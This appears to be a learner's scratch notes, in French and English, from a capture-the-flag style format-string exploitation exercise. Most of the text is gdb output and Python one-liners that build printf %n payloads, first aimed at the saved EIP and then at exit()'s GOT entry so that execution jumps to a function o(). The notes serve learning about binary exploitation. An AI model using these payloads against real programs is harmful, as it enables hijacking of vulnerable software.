

in printf eip is at 0xbffff4fc
function o is at 0x080484a4 
let's put this adress in EIP


python -c "print '\xfc\xf4\xff\xbf' + '%134513824x' + '%4\$n'") 

ne marche pas avec 24, 25, 26 plante au milieu de la fonction (<o+2>)

j'arrive pas à lancer function o()

donc j'essaye au milieu de la fonction 
addresse 0x080484b1

(gdb) print 0x080484aa
$2 = 134513834

(gdb) set args <<<$(python -c "print '\xfc\xf4\xff\xbf' + '%134513830x' + '' + '%4\$n'")


ça fonctionne pas, eip dans printf change de temps en temps ---> le seum


on peut reecrire GOT ( global offset table) on reecrie exit()

on choppe l'adresse de exit dans la GOT et on y ecris l'adresse o()

<<<$(python -c "print '\x38\x98\x04\x08' + '%134513824x' + '' + '%4\$n'")

